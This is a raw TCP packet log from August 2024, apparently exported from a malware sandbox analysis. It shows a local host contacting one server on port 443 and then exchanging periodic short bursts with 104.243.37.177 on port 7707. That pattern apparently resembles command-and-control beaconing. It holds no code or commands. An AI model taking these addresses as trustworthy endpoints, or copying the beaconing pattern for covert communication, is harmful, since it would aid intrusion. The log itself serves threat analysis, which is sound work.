                                    Aug 29, 2024 19:41:57.708676100 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.708736897 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.709036112 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.709100962 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.709295988 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.709352970 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.709527016 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.709584951 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.710092068 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.710138083 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.710156918 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.710164070 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.710184097 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.710215092 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.710681915 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.710725069 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.710738897 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.710742950 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.710784912 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.710798979 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.711252928 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.711309910 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.711801052 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.711842060 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.711859941 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.711868048 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.711885929 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.711905956 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.718115091 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.718204021 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.718455076 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.718516111 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.718691111 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.718745947 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.719093084 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.719149113 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.795022964 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.795109987 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.795342922 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.795403004 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.795645952 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.795703888 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.796120882 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.796173096 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.796436071 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.796509981 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.796747923 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.796807051 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.797208071 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.797251940 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.797265053 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.797275066 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.797290087 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.797295094 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.797307968 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.797312975 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.797339916 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.797360897 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.798005104 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.798043013 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.798058033 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.798062086 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.798084974 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.798098087 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.798700094 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.798732996 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.798749924 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.798754930 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.798779011 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.798794031 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.806128979 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.806193113 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.806624889 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.806677103 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.806881905 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.806937933 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.807100058 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.807154894 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.881992102 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.882072926 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.882133007 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.882174015 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:42:00.214119911 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:42:20.249105930 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.254054070 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.254121065 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.267631054 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.272427082 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837666035 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837683916 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837738037 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.837888002 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837933064 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.844033003 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.848906994 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.954385996 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:21.007165909 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:21.244656086 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:21.250168085 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:21.250312090 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:21.255875111 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.039297104 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.044239044 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.044327021 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.049129963 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.281816959 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.335367918 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.369343042 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.403124094 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.407970905 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.408050060 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.412825108 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.820321083 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:34.826013088 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.826071024 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:34.831624985 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.947590113 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.991610050 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:35.035994053 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:35.037595034 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:35.042382002 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:35.042443037 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:35.047446966 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.712464094 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:41.717464924 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.717516899 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:41.722409964 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.913089037 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.960345984 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:42.060848951 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:42.062447071 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:42.072016001 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:42.072071075 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:42.077300072 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.491985083 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.497286081 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.497354984 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.503267050 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.995877981 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.997991085 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.998075008 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.998928070 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.998980045 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.999144077 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:49.004184008 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:49.004242897 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:49.009082079 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.297785044 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.302731037 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.302789927 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.307590961 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.497576952 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.538512945 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.585830927 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.587119102 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.592099905 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.592164993 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.597074032 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.070406914 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.075613976 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.075795889 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.080648899 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.262725115 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.304136038 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.392203093 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.397005081 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.402565002 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.402611017 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.408102989 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:08.867717981 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.016853094 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.016916037 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.024107933 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.223243952 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.272918940 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.376446009 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.378279924 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.383424997 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.383513927 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.388448000 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.688054085 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.696911097 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.697005987 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.703406096 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.835916996 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.882267952 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.973450899 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.974860907 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.980318069 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.980387926 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.985610962 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.476488113 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:22.482059956 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.482146025 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:22.487106085 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.656789064 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.710418940 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:22.788321018 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.789750099 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:22.795701981 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.795757055 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:22.804893017 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:29.273786068 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:29.279541016 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:29.279721022 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:29.284457922 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:29.509201050 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:29.554368973 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:29.639414072 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:29.640569925 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:29.645370007 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:29.645503044 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:29.650285959 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:36.070447922 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:36.075439930 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:36.075485945 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:36.080291033 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:36.257401943 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:36.304179907 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:36.387933016 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:36.389756918 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:36.395128012 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:36.395174026 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:36.400753975 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:39.773267984 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:39.778192997 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:39.778377056 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:39.783118963 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:39.916966915 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:39.960429907 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:40.047702074 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:40.049743891 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:40.054491997 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:40.054536104 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:40.059936047 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:43.883091927 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:43.888339996 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:43.888386965 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:43.893297911 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:44.044378042 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:44.085437059 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:44.179426908 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:44.183312893 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:44.190829992 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:44.190879107 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:44.196650028 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:49.589839935 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:49.594887972 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:49.594952106 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:49.599747896 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:49.787836075 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:49.835453033 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:49.923350096 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:49.924909115 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:49.929651022 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:49.929692030 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:49.934443951 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:56.382667065 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:56.388108969 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:56.388174057 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:56.393124104 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:56.508970976 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:56.556797028 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:57.666502953 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:57.667723894 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:57.667850018 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:57.668045998 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:57.669116020 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:57.669176102 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:57.669953108 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:57.670217991 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:57.674683094 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:57.677930117 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:57.683490038 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:58.711282969 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:58.716821909 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:58.717000008 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:58.722543955 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:58.838664055 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:58.882483959 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:58.928472042 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:58.970630884 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:58.978147984 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:58.978224993 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:58.985234976 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:05.492239952 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:05.497479916 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:05.497570992 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:05.502559900 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:06.723884106 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:06.723965883 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:06.724021912 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:06.724385977 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:06.724461079 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:06.724718094 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:06.724759102 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:06.725315094 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:06.725358009 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:06.725666046 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:06.949328899 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:06.949418068 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:06.954960108 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:09.368875980 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:09.374699116 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:09.374814987 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:09.380671978 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:09.498663902 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:09.554233074 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:09.586976051 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:09.588646889 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:09.594366074 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:09.596957922 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:09.601815939 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:16.181816101 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:16.187364101 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:16.187408924 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:16.192270041 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:16.409800053 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:16.460500002 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:16.539680958 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:16.541409969 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:16.546271086 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:16.546312094 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:16.551326990 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:18.651664972 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:18.656730890 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:18.656821966 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:18.662504911 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:18.799813986 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:18.851140976 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:18.932468891 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:18.941885948 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:18.947231054 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:18.949876070 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:18.955024958 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:25.429605007 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:25.434545040 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:25.438041925 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:25.442882061 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:25.665585995 CEST770749738104.243.37.177192.168.2.4
